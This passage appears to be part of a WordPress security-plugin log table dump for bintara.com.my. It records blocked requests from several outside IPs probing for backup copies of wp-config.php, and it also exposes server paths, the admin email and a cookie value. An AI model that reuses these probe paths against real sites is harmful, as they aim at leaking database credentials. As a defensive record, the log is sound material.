"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ68jOBT1onqG4TOWhlluwAAARM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570684044.3582\";s:12:\"REQUEST_TIME\";s:10:\"1570684044\";}}','notice','2019-10-10 05:07:26','2019-10-10 05:07:24',35045288,36850568,'https://bintara.com.my/wp-config.php.save',1,0,'171.25.193.77'),(27852,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wp-config.php.save.2\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=0ba6514538b8f7a5dd4fe659e9fa189d\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:147:\"Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; SAMSUNG-SGH-I317 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.2\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:21:\"/wp-config.php.save.2\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ68lxypZvX7@gJ12mPF6AAAAIU\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.2\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wp-config.php.save.2\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ68lxypZvX7@gJ12mPF6AAAAIU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"171.25.193.77\";s:11:\"REMOTE_PORT\";s:5:\"64826\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.2\";s:10:\"SCRIPT_URL\";s:21:\"/wp-config.php.save.2\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ68lxypZvX7@gJ12mPF6AAAAIU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570684055.2583\";s:12:\"REQUEST_TIME\";s:10:\"1570684055\";}}','notice','2019-10-10 05:07:37','2019-10-10 05:07:35',35045616,36852200,'https://bintara.com.my/wp-config.php.save.2',1,0,'171.25.193.77'),(27853,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wp-config.php.save.3\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=0ba6514538b8f7a5dd4fe659e9fa189d\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:147:\"Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; SAMSUNG-SGH-I317 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.3\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:21:\"/wp-config.php.save.3\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ68phypZvX7@gJ12mPF7AAAAIQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.3\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wp-config.php.save.3\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ68phypZvX7@gJ12mPF7AAAAIQ\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"171.25.193.77\";s:11:\"REMOTE_PORT\";s:5:\"20741\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.3\";s:10:\"SCRIPT_URL\";s:21:\"/wp-config.php.save.3\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ68phypZvX7@gJ12mPF7AAAAIQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570684070.5722\";s:12:\"REQUEST_TIME\";s:10:\"1570684070\";}}','notice','2019-10-10 05:07:52','2019-10-10 05:07:50',35041296,36848800,'https://bintara.com.my/wp-config.php.save.3',1,0,'171.25.193.77'),(27854,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wp-config.php.save.4\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=0ba6514538b8f7a5dd4fe659e9fa189d\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:147:\"Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; SAMSUNG-SGH-I317 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.4\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:21:\"/wp-config.php.save.4\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ68rH6YXSDJF91Gv2P@TwAAABE\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.4\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wp-config.php.save.4\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ68rH6YXSDJF91Gv2P@TwAAABE\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"171.25.193.77\";s:11:\"REMOTE_PORT\";s:5:\"25956\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.4\";s:10:\"SCRIPT_URL\";s:21:\"/wp-config.php.save.4\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ68rH6YXSDJF91Gv2P@TwAAABE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570684077.0107\";s:12:\"REQUEST_TIME\";s:10:\"1570684077\";}}','notice','2019-10-10 05:07:59','2019-10-10 05:07:57',35045616,36852200,'https://bintara.com.my/wp-config.php.save.4',1,0,'171.25.193.77'),(27855,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wp-config.php.save.5\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=0ba6514538b8f7a5dd4fe659e9fa189d\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:147:\"Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; SAMSUNG-SGH-I317 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.5\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:21:\"/wp-config.php.save.5\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ68tOBT1onqG4TOWhll6QAAARI\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.5\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wp-config.php.save.5\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ68tOBT1onqG4TOWhll6QAAARI\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"171.25.193.77\";s:11:\"REMOTE_PORT\";s:5:\"31287\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.5\";s:10:\"SCRIPT_URL\";s:21:\"/wp-config.php.save.5\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ68tOBT1onqG4TOWhll6QAAARI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570684085.0018\";s:12:\"REQUEST_TIME\";s:10:\"1570684085\";}}','notice','2019-10-10 05:08:07','2019-10-10 05:08:05',35045616,36852200,'https://bintara.com.my/wp-config.php.save.5',1,0,'171.25.193.77'),(27856,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wp-config.php.save.6\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=0ba6514538b8f7a5dd4fe659e9fa189d\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:147:\"Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; SAMSUNG-SGH-I317 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.6\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:21:\"/wp-config.php.save.6\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ68wKyUrY9zjNB4Mhe2kwAAAYA\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.6\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wp-config.php.save.6\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ68wKyUrY9zjNB4Mhe2kwAAAYA\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"171.25.193.77\";s:11:\"REMOTE_PORT\";s:5:\"38937\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.6\";s:10:\"SCRIPT_URL\";s:21:\"/wp-config.php.save.6\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ68wKyUrY9zjNB4Mhe2kwAAAYA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570684096.3278\";s:12:\"REQUEST_TIME\";s:10:\"1570684096\";}}','notice','2019-10-10 05:08:18','2019-10-10 05:08:16',35044944,36849800,'https://bintara.com.my/wp-config.php.save.6',1,0,'171.25.193.77'),(27857,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wp-config.php.save.7\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=0ba6514538b8f7a5dd4fe659e9fa189d\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:147:\"Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; SAMSUNG-SGH-I317 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.7\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:21:\"/wp-config.php.save.7\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ68zayUrY9zjNB4Mhe2lgAAAYM\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.7\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wp-config.php.save.7\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ68zayUrY9zjNB4Mhe2lgAAAYM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"5.199.135.107\";s:11:\"REMOTE_PORT\";s:5:\"37784\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.7\";s:10:\"SCRIPT_URL\";s:21:\"/wp-config.php.save.7\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ68zayUrY9zjNB4Mhe2lgAAAYM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570684109.9295\";s:12:\"REQUEST_TIME\";s:10:\"1570684109\";}}','notice','2019-10-10 05:08:31','2019-10-10 05:08:30',35045616,36852200,'https://bintara.com.my/wp-config.php.save.7',1,0,'5.199.135.107'),(27858,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wp-config.php.save.8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=0ba6514538b8f7a5dd4fe659e9fa189d\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:147:\"Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; SAMSUNG-SGH-I317 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.8\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:21:\"/wp-config.php.save.8\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ682qyUrY9zjNB4Mhe2ngAAAZU\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.8\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wp-config.php.save.8\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ682qyUrY9zjNB4Mhe2ngAAAZU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"5.199.135.107\";s:11:\"REMOTE_PORT\";s:5:\"35263\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.8\";s:10:\"SCRIPT_URL\";s:21:\"/wp-config.php.save.8\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ682qyUrY9zjNB4Mhe2ngAAAZU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570684123.0283\";s:12:\"REQUEST_TIME\";s:10:\"1570684123\";}}','notice','2019-10-10 05:08:45','2019-10-10 05:08:43',35045616,36852200,'https://bintara.com.my/wp-config.php.save.8',1,0,'5.199.135.107'),(27859,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wp-config.php.save.9\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=0ba6514538b8f7a5dd4fe659e9fa189d\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:147:\"Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; SAMSUNG-SGH-I317 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.9\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:21:\"/wp-config.php.save.9\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ685X6YXSDJF91Gv2P@bQAAABc\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.9\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wp-config.php.save.9\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ685X6YXSDJF91Gv2P@bQAAABc\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"195.206.105.217\";s:11:\"REMOTE_PORT\";s:5:\"34922\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";